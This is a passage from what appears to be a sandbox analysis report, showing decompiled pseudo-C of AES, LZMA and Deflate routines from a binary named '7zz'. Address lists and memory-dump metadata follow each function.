						 *(_t439 + 0x18) =  *(0x492968 + (_t294 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492d68 + (_t395 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x493168 + (_t375 >> 0x18) * 4) ^  *(0x492568 + (_t265 & 0x000000ff) * 4) ^ _t171[4];
						 *(_t439 + 0x20) =  *(0x492968 + (_t375 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492d68 + (_t265 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x493168 + (_t294 >> 0x18) * 4) ^  *(0x492568 + (_t395 & 0x000000ff) * 4) ^ _t171[6];
						_t411 =  *(0x492968 + (_t395 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x492d68 + (_t375 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x493168 + (_t265 >> 0x18) * 4) ^  *(0x492568 + (_t294 & 0x000000ff) * 4) ^ _t171[7];
						_t283 =  *(_t439 + 0x20);
						_t385 =  *(_t439 + 0x18);
						_t180 =  *(0x492d68 + (_t294 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x492968 + (_t265 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x493168 + (_t395 >> 0x18) * 4) ^  *(0x492568 + (_t375 & 0x000000ff) * 4) ^ _t171[5];
						_t142 = _t439 + 0x10;
						 *_t142 =  *((intOrPtr*)(_t439 + 0x10)) - 1;
					} while ( *_t142 != 0);
				}
				 *( *(_t439 + 0x3c)) = ((( *((_t283 >> 0x00000010 & 0x000000ff) + 0x493568) & 0x000000ff | ( *((_t180 >> 0x18) + 0x493568) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t411 >> 0x00000008 & 0x000000ff) + 0x493568) & 0x000000ff) << 0x00000008 |  *((_t385 & 0x000000ff) + 0x493568) & 0x000000ff) ^  *_t171;
				( *(_t439 + 0x3c))[1] = ((( *((_t411 >> 0x00000010 & 0x000000ff) + 0x493568) & 0x000000ff | ( *((_t283 >> 0x18) + 0x493568) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t385 >> 0x00000008 & 0x000000ff) + 0x493568) & 0x000000ff) << 0x00000008 |  *((_t180 & 0x000000ff) + 0x493568) & 0x000000ff) ^ _t171[1];
				_t257 =  *(_t439 + 0x3c);
				_t257[2] = ((( *((_t385 >> 0x00000010 & 0x000000ff) + 0x493568) & 0x000000ff | ( *((_t411 >> 0x18) + 0x493568) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t180 >> 0x00000008 & 0x000000ff) + 0x493568) & 0x000000ff) << 0x00000008 |  *((_t283 & 0x000000ff) + 0x493568) & 0x000000ff) ^ _t171[2];
				_t257[3] = ((( *((_t180 >> 0x00000010 & 0x000000ff) + 0x493568) & 0x000000ff | ( *((_t385 >> 0x18) + 0x493568) & 0x000000ff) << 0x00000008) << 0x00000008 |  *((_t283 >> 0x00000008 & 0x000000ff) + 0x493568) & 0x000000ff) << 0x00000008 |  *((_t411 & 0x000000ff) + 0x493568) & 0x000000ff) ^ _t171[3];
				return _t171;
			}

0x0046a958
0x0046a95a
0x0046a95e
0x0046a965
0x0046a96c
0x0046a96f
0x0046a975
0x0046a977
0x0046a97f
0x0046aa07
0x0046aa1b
0x0046aa1e
0x0046aa6e
0x0046aa8b
0x0046aa8e
0x0046aa91
0x0046aa91
0x0046aa95
0x0046aa99
0x0046aa9d
0x0046aaa3
0x0046aaf6
0x0046ab3b
0x0046ab61
0x0046ab75
0x0046ab81
0x0046ab8c
0x0046abbf
0x0046abff
0x0046ac05
0x0046ac50
0x0046ac9a
0x0046aca3
0x0046acc1
0x0046acd2
0x0046acd5
0x0046acd5
0x0046acd5
0x0046aaa3
0x0046ad33
0x0046ad8a
0x0046adde
0x0046ade2
0x0046ae2e
0x0046ae38

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f76d5444e41b3de3b0bb7ae30d3e020519421e5863b0ecd3f8ef0fb47bc375e4
Instruction ID: 5fe5ef698221ee210b1989aac551cfa729ecf53191c0a867fccea901994a2467
Opcode Fuzzy Hash: f76d5444e41b3de3b0bb7ae30d3e020519421e5863b0ecd3f8ef0fb47bc375e4
Instruction Fuzzy Hash: 32D1DE329046A65FE314DF5DDC9023277A2ABD9319F0B023AC6901B2A2C734AB16DB94

Uniqueness

Uniqueness Score: -1.00%

Function 0045EA60 Relevance: .3, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0045EA60(intOrPtr* __ecx, intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t129;
				intOrPtr _t130;
				int _t135;
				void* _t138;
				void* _t147;
				int _t155;
				void* _t160;
				int* _t163;
				int* _t164;
				unsigned int _t170;
				int _t175;
				intOrPtr _t177;
				int* _t180;
				intOrPtr _t181;
				int* _t186;
				intOrPtr _t187;
				intOrPtr _t190;
				int* _t197;
				signed int _t203;
				intOrPtr _t207;
				signed int _t209;
				int _t222;
				int* _t223;
				intOrPtr _t224;
				void* _t226;
				void* _t231;
				intOrPtr* _t234;
				int _t235;
				int _t236;
				signed int _t237;
				void* _t238;

				_t129 =  *((intOrPtr*)(_t238 + 0x30));
				_t234 = __ecx;
				_t186 =  *(_t238 + 0x44);
				 *(_t238 + 0x2c) =  *_t186;
				_t222 = 0;
				 *((intOrPtr*)(_t238 + 0x34)) = __edx;
				_t207 =  *_t129;
				 *_t129 = 0;
				 *((intOrPtr*)(_t238 + 0x24)) = _t207;
				 *_t186 = 0;
				while(1) {
					_t187 =  *((intOrPtr*)(_t234 + 0x28));
					if( *((intOrPtr*)(_t234 + 0x24)) == _t187) {
						 *((intOrPtr*)(_t234 + 0x24)) = _t222;
					}
					_t130 =  *((intOrPtr*)(_t234 + 0x24));
					 *((intOrPtr*)(_t238 + 0x38)) = _t130;
					if(_t207 <= _t187 - _t130) {
						 *((intOrPtr*)(_t238 + 0x20)) = _t130 + _t207;
						 *((intOrPtr*)(_t238 + 0x30)) =  *((intOrPtr*)(_t238 + 0x4c));
					} else {
						 *((intOrPtr*)(_t238 + 0x20)) = _t187;
						 *((intOrPtr*)(_t238 + 0x30)) = _t222;
					}
					_t180 =  *(_t238 + 0x44);
					_t235 =  *(_t238 + 0x2c);
					 *(_t238 + 0x18) = _t180;
					 *(_t238 + 0x14) = _t235;
					 *((intOrPtr*)(_t238 + 0x10)) = _t222;
					E0045DFE0( *((intOrPtr*)(_t238 + 0x20)), _t234);
					_t223 =  *(_t238 + 0x50);
					 *_t223 = 0;
					if( *((intOrPtr*)(_t234 + 0x48)) != 0x112) {
						goto L15;
					}
					L7:
					if( *(_t234 + 0x20) == 0) {
						 *_t223 = 1;
					}
					_t237 = 0 |  *(_t234 + 0x20) != 0x00000000;
					L10:
					_t190 =  *((intOrPtr*)(_t238 + 0x10));
					 *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x48)))) =  *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x48)))) + _t190;
					_t181 =  *((intOrPtr*)(_t238 + 0x34));
					 *(_t238 + 0x44) =  *(_t238 + 0x44) + _t190;
					 *(_t238 + 0x2c) =  *(_t238 + 0x2c) - _t190;
					_t226 =  *((intOrPtr*)(_t234 + 0x24)) -  *((intOrPtr*)(_t238 + 0x38));
					E0046C5C0(_t181,  *((intOrPtr*)(_t234 + 0x14)) +  *((intOrPtr*)(_t238 + 0x38)), _t226);
					 *((intOrPtr*)(_t238 + 0x30)) =  *((intOrPtr*)(_t238 + 0x30)) - _t226;
					 *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x4c)))) =  *((intOrPtr*)( *((intOrPtr*)(_t238 + 0x4c)))) + _t226;
					_t238 = _t238 + 0xc;
					 *((intOrPtr*)(_t238 + 0x34)) = _t181 + _t226;
					if(_t237 != 0) {
						return _t237;
					} else {
						if(_t226 == 0 ||  *((intOrPtr*)(_t238 + 0x24)) == _t237) {
							return 0;
						} else {
							_t207 =  *((intOrPtr*)(_t238 + 0x24));
							_t222 = 0;
							continue;
						}
					}
					L15:
					while(1) {
						L15:
						if( *((intOrPtr*)(_t234 + 0x4c)) == 0) {
							L23:
							 *(_t238 + 0x1c) = 0;
							if( *((intOrPtr*)(_t234 + 0x24)) <  *((intOrPtr*)(_t238 + 0x20))) {
								_t209 = 1;
								goto L30;
							} else {
								_t177 =  *((intOrPtr*)(_t234 + 0x48));
								if(_t177 != 0 ||  *(_t234 + 0x20) != 0) {
									if( *((intOrPtr*)(_t238 + 0x30)) == 0) {
										 *_t223 = 2;
										_t237 = 0;
									} else {
										if(_t177 != 0) {
											 *_t223 = 2;
											goto L62;
										} else {
											_t209 = 1;
											 *(_t238 + 0x1c) = 1;
											L30:
											if( *((intOrPtr*)(_t234 + 0x50)) != 0) {
												_t231 =  *(_t234 + 0x10);
												_t170 = (0x300 <<  *((intOrPtr*)(_t234 + 4)) +  *_t234) + 0x736;
												if(0x300 != 0) {
													_t203 = _t170 >> 1;
													_t175 = memset(_t231, 0xbadfad, _t203 << 2);
													asm("adc ecx, ecx");
													memset(_t231 + _t203, _t175, 0);
													_t238 = _t238 + 0x18;
													_t209 = 1;
												}
												 *(_t234 + 0x44) = _t209;
												 *(_t234 + 0x40) = _t209;
												 *(_t234 + 0x3c) = _t209;
												 *(_t234 + 0x38) = _t209;
												 *((intOrPtr*)(_t234 + 0x34)) = 0;
												 *((intOrPtr*)(_t234 + 0x50)) = 0;
											}
											_t135 =  *(_t234 + 0x58);
											if(_t135 != 0) {
												_t236 = _t135;
												_t224 = 0;
												 *((intOrPtr*)(_t238 + 0x28)) = 0;
												if(_t236 < 0x14) {
													while(_t224 <  *(_t238 + 0x14)) {
														 *((char*)(_t234 + _t236 + 0x5c)) =  *((intOrPtr*)(_t224 + _t180));
														_t236 = _t236 + _t209;
														_t224 = _t224 + _t209;
														if(_t236 < 0x14) {
															continue;
														}
														break;
													}
													 *((intOrPtr*)(_t238 + 0x28)) = _t224;
												}
												 *(_t234 + 0x58) = _t236;
												if(_t236 < 0x14 ||  *(_t238 + 0x1c) != 0) {
													_t138 = E0045E0C0(_t236, _t234, _t234 + 0x5c);
													if(_t138 == 0) {
														 *((intOrPtr*)(_t238 + 0x10)) =  *((intOrPtr*)(_t238 + 0x10)) + _t224;
														 *( *(_t238 + 0x50)) = 3;
														_t237 = 0;
													} else {
														if( *(_t238 + 0x1c) == 0 || _t138 == 2) {
															goto L54;
														} else {
															 *( *(_t238 + 0x50)) = 2;
															_t237 = 1;
														}
													}
												} else {
													L54:
													 *(_t234 + 0x18) = _t234 + 0x5c;
													if(E0045E050(_t234, _t234 + 0x5c,  *((intOrPtr*)(_t238 + 0x20))) != 0) {
														goto L62;
													} else {
														_t147 =  *((intOrPtr*)(_t238 + 0x28)) +  *(_t234 + 0x18) - _t236 - _t234 - 0x5c;
														 *(_t238 + 0x18) =  *(_t238 + 0x18) + _t147;
														 *(_t234 + 0x58) = 0;
														goto L56;
													}
												}
											} else {
												if(_t235 < 0x14 ||  *(_t238 + 0x1c) != _t135) {
													_t160 = E0045E0C0(_t235, _t234, _t180);
													if(_t160 == 0) {
														E0046C5C0(_t234 + 0x5c, _t180, _t235);
														_t163 =  *(_t238 + 0x5c);
														 *(_t238 + 0x1c) =  *(_t238 + 0x1c) + _t235;
														 *(_t234 + 0x58) = _t235;
														_t238 = _t238 + 0xc;
														 *_t163 = 3;
														_t237 = 0;
													} else {
														if( *(_t238 + 0x1c) == 0 || _t160 == 2) {
															_t164 = _t180;
															goto L42;
														} else {
															 *( *(_t238 + 0x50)) = 2;
															_t237 = 1;
														}
													}
												} else {
													_t164 = _t180 + _t235 - 0x14;
													L42:
													 *(_t234 + 0x18) = _t180;
													if(E0045E050(_t234, _t164,  *((intOrPtr*)(_t238 + 0x20))) != 0) {
														goto L62;
													} else {
														_t197 =  *(_t238 + 0x18);
														_t147 =  *(_t234 + 0x18) - _t197;
														 *(_t238 + 0x18) = _t197 + _t147;
														L56:
														 *((intOrPtr*)(_t238 + 0x10)) =  *((intOrPtr*)(_t238 + 0x10)) + _t147;
														 *(_t238 + 0x14) =  *(_t238 + 0x14) - _t147;
														_t223 =  *(_t238 + 0x50);
														if( *((intOrPtr*)(_t234 + 0x48)) != 0x112) {
															_t180 =  *(_t238 + 0x18);
															_t235 =  *(_t238 + 0x14);
															continue;
														} else {
															goto L7;
														}
													}
												}
											}
										}
									}
								} else {
									 *_t223 = 4;
									_t237 = 0;
								}
							}
						} else {
							if(_t235 > 0) {
								while(1) {
									_t155 =  *(_t234 + 0x58);
									if(_t155 >= 5) {
										break;
									}
									 *((char*)(_t234 + 0x5c + _t155)) =  *_t180;
									 *(_t234 + 0x58) =  *(_t234 + 0x58) + 1;
									 *((intOrPtr*)(_t238 + 0x10)) =  *((intOrPtr*)(_t238 + 0x10)) + 1;
									_t180 =  &(_t180[0]);
									_t235 = _t235 - 1;
									if(_t235 != 0) {
										continue;
									}
									break;
								}
								 *(_t238 + 0x18) = _t180;
								 *(_t238 + 0x14) = _t235;
							}
							if( *(_t234 + 0x58) < 5) {
								 *_t223 = 3;
								_t237 = 0;
							} else {
								if( *(_t234 + 0x5c) != 0) {
									L62:
									_t237 = 1;
								} else {
									 *(_t234 + 0x20) = ((( *(_t234 + 0x5d) & 0x000000ff) << 0x00000008 |  *(_t234 + 0x5e) & 0x000000ff) << 0x00000008 |  *(_t234 + 0x5f) & 0x000000ff) << 0x00000008 |  *(_t234 + 0x60) & 0x000000ff;
									 *((intOrPtr*)(_t234 + 0x1c)) = 0xffffffff;
									 *((intOrPtr*)(_t234 + 0x4c)) = 0;
									 *(_t234 + 0x58) = 0;
									goto L23;
								}
							}
						}
						goto L10;
					}
				}
			}

0x0045ea63
0x0045ea6a
0x0045ea6c
0x0045ea73
0x0045ea77
0x0045ea79
0x0045ea7d
0x0045ea7f
0x0045ea81
0x0045ea85
0x0045ea87
0x0045ea87
0x0045ea8d
0x0045ea8f
0x0045ea8f
0x0045ea92
0x0045ea99
0x0045ea9f
0x0045eaad
0x0045eab5
0x0045eaa1
0x0045eaa1
0x0045eaa5
0x0045eaa5
0x0045eab9
0x0045eabd
0x0045eac5
0x0045eac9
0x0045eacd
0x0045ead1
0x0045ead6
0x0045eada
0x0045eae7
0x00000000
0x00000000
0x0045eaed
0x0045eaf1
0x0045eaf3
0x0045eaf3
0x0045eb01
0x0045eb03
0x0045eb03
0x0045eb0b
0x0045eb17
0x0045eb1b
0x0045eb1f
0x0045eb23
0x0045eb2a
0x0045eb33
0x0045eb37
0x0045eb3b
0x0045eb3e
0x0045eb44
0x0045ee2e
0x0045eb4a
0x0045eb4c
0x0045ee3a
0x0045eb5c
0x0045eb5c
0x0045eb60
0x00000000
0x0045eb60
0x0045eb4c
0x00000000
0x0045eb78
0x0045eb78
0x0045eb7d
0x0045ebed
0x0045ebf1
0x0045ebf8
0x0045ec27
0x00000000
0x0045ebfa
0x0045ebfa
0x0045ebff
0x0045ec0e
0x0045eda5
0x0045edab
0x0045ec14
0x0045ec16
0x0045edb2
0x00000000
0x0045ec1c
0x0045ec1c
0x0045ec21
0x0045ec2c
0x0045ec2f
0x0045ec36
0x0045ec40
0x0045ec45
0x0045ec58
0x0045ec5a
0x0045ec5c
0x0045ec5e
0x0045ec5e
0x0045ec61
0x0045ec61
0x0045ec68
0x0045ec6b
0x0045ec6e
0x0045ec71
0x0045ec74
0x0045ec77
0x0045ec77
0x0045ec7a
0x0045ec7f
0x0045ece2
0x0045ece4
0x0045ece6
0x0045eced
0x0045ecf0
0x0045ecf9
0x0045ecfd
0x0045ecff
0x0045ed04
0x00000000
0x00000000
0x00000000
0x0045ed04
0x0045ed06
0x0045ed06
0x0045ed0a
0x0045ed10
0x0045ed21
0x0045ed28
0x0045ee00
0x0045ee04
0x0045ee0a
0x0045ed2e
0x0045ed33
0x00000000
0x0045ee11
0x0045ee15
0x0045ee1b
0x0045ee1b
0x0045ed33
0x0045ed3e
0x0045ed3e
0x0045ed47
0x0045ed51
0x00000000
0x0045ed53
0x0045ed5e
0x0045ed62
0x0045ed66
0x00000000
0x0045ed66
0x0045ed51
0x0045ec81
0x0045ec84
0x0045ec97
0x0045ec9e
0x0045edc8
0x0045edcd
0x0045edd1
0x0045edd5
0x0045edd8
0x0045eddb
0x0045ede1
0x0045eca4
0x0045eca9
0x0045ecb4
0x00000000
0x0045ede8
0x0045edec
0x0045edf2
0x0045edf2
0x0045eca9
0x0045ec8c
0x0045ec8c
0x0045ecb6
0x0045ecba
0x0045ecc8
0x00000000
0x0045ecce
0x0045ecce
0x0045ecd5
0x0045ecd9
0x0045ed6d
0x0045ed6d
0x0045ed71
0x0045ed7c
0x0045ed80
0x0045eb70
0x0045eb74
0x00000000
0x0045ed86
0x00000000
0x0045ed86
0x0045ed80
0x0045ecc8
0x0045ec84
0x0045ec7f
0x0045ec16
0x0045ed98
0x0045ed98
0x0045ed9e
0x0045ed9e
0x0045ebff
0x0045eb7f
0x0045eb81
0x0045eb83
0x0045eb83
0x0045eb89
0x00000000
0x00000000
0x0045eb8d
0x0045eb96
0x0045eb99
0x0045eb9d
0x0045eb9f
0x0045eba1
0x00000000
0x00000000
0x00000000
0x0045eba1
0x0045eba3
0x0045eba7
0x0045eba7
0x0045ebaf
0x0045ed8b
0x0045ed91
0x0045ebb5
0x0045ebb8
0x0045edb8
0x0045edb8
0x0045ebbe
0x0045ebdd
0x0045ebe0
0x0045ebe7
0x0045ebea
0x00000000
0x0045ebea
0x0045ebb8
0x0045ebaf
0x00000000
0x0045eb7d
0x0045eb78

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573156522.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573171372.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_7zz.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e26c666307ba7ad46120496990269a28762d07bb32c68e3a76c2fa520b537bec
Instruction ID: 39f11e55284d46da5960dba5874f1d448917b1de7ce1ab50debae43cae9d3b1e
Opcode Fuzzy Hash: e26c666307ba7ad46120496990269a28762d07bb32c68e3a76c2fa520b537bec
Instruction Fuzzy Hash: C0C132705087458FD728CF2AC48461BB7F1BF89306F14492FE98687752E3B8EA49CB56

Uniqueness

Uniqueness Score: -1.00%

Function 0044A440 Relevance: .3, Instructions: 291
COMMONCrypto

Download Yara Rule

C-Code - Quality: 72%

			E0044A440(void* __ecx, void* __eflags) {
				void* _t114;
				intOrPtr _t128;
				void* _t132;
				signed int _t165;
				void* _t176;
				signed int _t179;
				void* _t191;
				unsigned int _t194;
				intOrPtr _t196;
				signed int _t197;
				signed int _t204;
				signed int _t205;
				signed int _t211;
				unsigned int _t220;
				unsigned int _t221;
				signed int _t222;
				signed char _t239;
				intOrPtr* _t244;
				int _t245;
				intOrPtr _t246;
				unsigned int _t258;
				void* _t274;
				int _t285;
				void* _t288;
				void* _t290;
				void* _t291;
				signed int _t292;
				void* _t293;
				void* _t294;
				void* _t295;
				void* _t296;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;

				_t293 = __ecx;
				 *((char*)(__ecx + 0xd48)) = E0044A200(1) & 0xffffff00 | _t112 == 0x00000001;
				_t114 = E0044A200(2);
				if(_t114 <= 2) {
					if(_t114 != 0) {
						 *((char*)(__ecx + 0xd49)) = 0;
						if(_t114 != 1) {
							 *((intOrPtr*)(_t294 + 0x20)) = E0044A200(5) + 0x101;
							 *((intOrPtr*)(__ecx + 0xd4c)) = E0044A200(5) + 1;
							_t176 = E0044A200(4) + 4;
							if( *((intOrPtr*)(__ecx + 0xd51)) != 0 ||  *((intOrPtr*)(__ecx + 0xd4c)) <= 0x1e) {
								_t285 = 0;
								do {
									if(_t285 >= _t176) {
										 *((char*)(_t294 + 0x20)) = 0;
									} else {
										 *((char*)(_t294 + 0x20)) = E0044A200(3);
									}
									_t285 = _t285 + 1;
								} while (_t285 < 0x13);
								_t244 = _t293 + 0xaf8;
								memset(_t294 + 0x38, 0, 0xf << 2);
								_t295 = _t294 + 0xc;
								_t258 = 0;
								_t191 = 0;
								while(0 <= 0xf) {
									 *_t244 = 0xffffffff;
									_t191 = _t191 + 1;
									_t244 = _t244 + 4;
									 *((intOrPtr*)(_t295 + 0x34)) =  *((intOrPtr*)(_t295 + 0x34)) + 1;
									if(_t191 < 0x13) {
										continue;
									} else {
										_t128 = 0;
										 *(_t295 + 0x34) = _t258;
										 *(_t293 + 0xa78) = _t258;
										 *(_t293 + 0xab8) = _t258;
										 *((intOrPtr*)(_t295 + 0x10)) = 0;
										_t245 = 1;
										while(1) {
											_t288 = _t295 + 0x34 + _t245 * 4;
											_t258 = _t258 + ( *(_t295 + 0x34 + _t245 * 4) << 0xf - _t245);
											 *(_t295 + 0x18) = _t258;
											if(_t258 > 0x8000) {
												goto L35;
											}
											_t194 = 0x8000;
											if(_t245 != 0xf) {
												_t194 = _t258;
											}
											 *(_t293 + 0xa78 + _t245 * 4) = _t194;
											_t196 =  *((intOrPtr*)(_t293 + 0xab4 + _t245 * 4)) +  *((intOrPtr*)(_t288 - 4));
											 *((intOrPtr*)(_t293 + 0xab8 + _t245 * 4)) = _t196;
											 *((intOrPtr*)(_t295 + 0x1b4 + _t245 * 4)) = _t196;
											if(_t245 <= 9) {
												_t220 =  *(_t293 + 0xa78 + _t245 * 4) >> 6;
												if(_t128 < _t220) {
													_t75 = _t293 + 0xb44; // 0xb44
													_t274 = _t128 + _t75;
													_t221 = _t220 - _t128;
													 *(_t295 + 0x14) = _t221;
													_t292 = _t221;
													_t222 = _t221 >> 2;
													memset(_t274 + _t222, memset(_t274, _t245, _t222 << 2), (_t292 & 0x00000003) << 0);
													_t295 = _t295 + 0x18;
													_t258 =  *(_t295 + 0x18);
													_t128 =  *((intOrPtr*)(_t295 + 0x10)) + _t292;
													 *((intOrPtr*)(_t295 + 0x10)) = _t128;
												}
											}
											_t245 = _t245 + 1;
											if(_t245 <= 0xf) {
												continue;
											} else {
												_t246 = 0;
												do {
													if(0 != 0) {
														_t197 =  *(_t295 + 0x1b4);
														 *((intOrPtr*)(_t293 + 0xaf8 + _t197 * 4)) = _t246;
														 *(_t295 + 0x1b4) = _t197 + 1;
													}
													_t246 = _t246 + 1;
												} while (_t246 < 0x13);
												_t179 =  *(_t295 + 0x1c);
												_t132 = E0044A2A0(_t295 + 0x1f4, _t179 +  *(_t293 + 0xd4c));
												if(_t132 != 0) {
													_t290 = _t295 + 0x1f4;
													memset(_t295 + 0x175, 0, 7 << 2);
													_t296 = _t295 + 0xc;
													asm("stosw");
													asm("stosb");
													memset(_t296 + 0x194, 0, 8 << 2);
													_t297 = _t296 + 0xc;
													_t204 = _t179;
													_t205 = _t204 >> 2;
													memcpy(_t297 + 0x74, _t290, _t205 << 2);
													memcpy(_t290 + _t205 + _t205, _t290, _t204 & 0x00000003);
													_t299 = _t297 + 0x18;
													_t291 = _t299 + _t179 + 0x1f4;
													_t211 =  *(_t293 + 0xd4c) >> 2;
													memcpy(_t291 + _t211 + _t211, _t291, memcpy(_t299 + 0x194, _t291, _t211 << 2) & 0x00000003);
													_t301 = _t299 + 0x18;
													goto L34;
												} else {
													return _t132;
												}
											}
											goto L37;
										}
										goto L35;
									}
									goto L37;
								}
								goto L35;
							} else {
								return 0;
							}
						} else {
							memset(_t294 + 0x74, 0x8080808, 0x24 << 2);
							_t303 = _t294 + 0xc;
							memset(_t303 + 0x104, 0x9090909, 0x1c << 2);
							_t304 = _t303 + 0xc;
							memset(_t304 + 0x174, 0x7070707, 6 << 2);
							_t305 = _t304 + 0xc;
							 *(_t305 + 0x18c) = 0x8080808;
							 *(_t305 + 0x190) = 0x8080808;
							memset(_t305 + 0x194, 0x5050505, 8 << 2);
							_t301 = _t305 + 0xc;
							asm("sbb eax, eax");
							 *(_t293 + 0xd4c) = ( ~( *(_t293 + 0xd51)) & 0x00000002) + 0x1e;
							L34:
							_push(_t301 + 0x74);
							if(E0044B440(_t293 + 0x78) != 0) {
								_push(_t301 + 0x194);
								return E0044B590(_t293 + 0x778);
							} else {
								L35:
								return 0;
							}
						}
					} else {
						 *((char*)(__ecx + 0xd49)) = 1;
						_t165 =  *(__ecx + 0x40);
						_t239 =  ~_t165 & 0x00000007;
						 *(__ecx + 0x40) = _t165 + _t239;
						 *(__ecx + 0x70) =  *(__ecx + 0x70) >> _t239;
						 *((intOrPtr*)(__ecx + 0xd44)) = E0044A200(0x10);
						if( *((intOrPtr*)(__ecx + 0xd50)) == 0) {
							return 0 |  *((intOrPtr*)(__ecx + 0xd44)) == ( !(E0044A200(0x10)) & 0x0000ffff);
						} else {
							return 1;
						}
					}
				} else {
					return 0;
				}
				L37:
			}

0x0044a44a
0x0044a45d
0x0044a463
0x0044a46b
0x0044a47c
0x0044a4ef
0x0044a4f6
0x0044a581
0x0044a58f
0x0044a5a2
0x0044a5a7
0x0044a5bf
0x0044a5c1
0x0044a5cd
0x0044a5de
0x0044a5cf
0x0044a5d8
0x0044a5d8
0x0044a5e3
0x0044a5e4
0x0044a5f4
0x0044a5fa
0x0044a5fa
0x0044a5fc
0x0044a5fe
0x0044a600
0x0044a618
0x0044a61e
0x0044a61f
0x0044a625
0x0044a627
0x00000000
0x0044a629
0x0044a629
0x0044a62b
0x0044a62f
0x0044a635
0x0044a63b
0x0044a63f
0x0044a644
0x0044a648
0x0044a655
0x0044a65d
0x0044a661
0x00000000
0x00000000
0x0044a66a
0x0044a66f
0x0044a671
0x0044a671
0x0044a676
0x0044a684
0x0044a689
0x0044a690
0x0044a697
0x0044a6a0
0x0044a6a5
0x0044a6a7
0x0044a6a7
0x0044a6ae
0x0044a6b2
0x0044a6b8
0x0044a6c4
0x0044a6ce
0x0044a6ce
0x0044a6d4
0x0044a6da
0x0044a6dc
0x0044a6dc
0x0044a6a5
0x0044a6e0
0x0044a6e4
0x00000000
0x0044a6ea
0x0044a6ea
0x0044a6ec
0x0044a6f4
0x0044a6f6
0x0044a704
0x0044a70c
0x0044a70c
0x0044a70e
0x0044a70f
0x0044a714
0x0044a72d
0x0044a734
0x0044a74f
0x0044a756
0x0044a756
0x0044a758
0x0044a75a
0x0044a769
0x0044a769
0x0044a76b
0x0044a773
0x0044a776
0x0044a77d
0x0044a77d
0x0044a785
0x0044a795
0x0044a79f
0x0044a79f
0x00000000
0x0044a740
0x0044a740
0x0044a740
0x0044a734
0x00000000
0x0044a6e4
0x00000000
0x0044a644
0x00000000
0x0044a627
0x00000000
0x0044a5b5
0x0044a5be
0x0044a5be
0x0044a4f8
0x0044a50b
0x0044a50b
0x0044a51e
0x0044a51e
0x0044a531
0x0044a531
0x0044a533
0x0044a54b
0x0044a552
0x0044a552
0x0044a55c
0x0044a564
0x0044a7a1
0x0044a7a5
0x0044a7b0
0x0044a7cc
0x0044a7dc
0x0044a7b5
0x0044a7b5
0x0044a7be
0x0044a7be
0x0044a7b0
0x0044a47e
0x0044a47e
0x0044a485
0x0044a48f
0x0044a49a
0x0044a49d
0x0044a4a5
0x0044a4b3
0x0044a4eb
0x0044a4b8
0x0044a4c1
0x0044a4c1
0x0044a4b3
0x0044a470
0x0044a479
0x0044a479
0x00000000

Memory Dump Source

Source File: 0000000F.00000002.573016723.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.572995163.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573100593.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573121873.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573130795.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573138835.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 0000000F.00000002.573146694.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
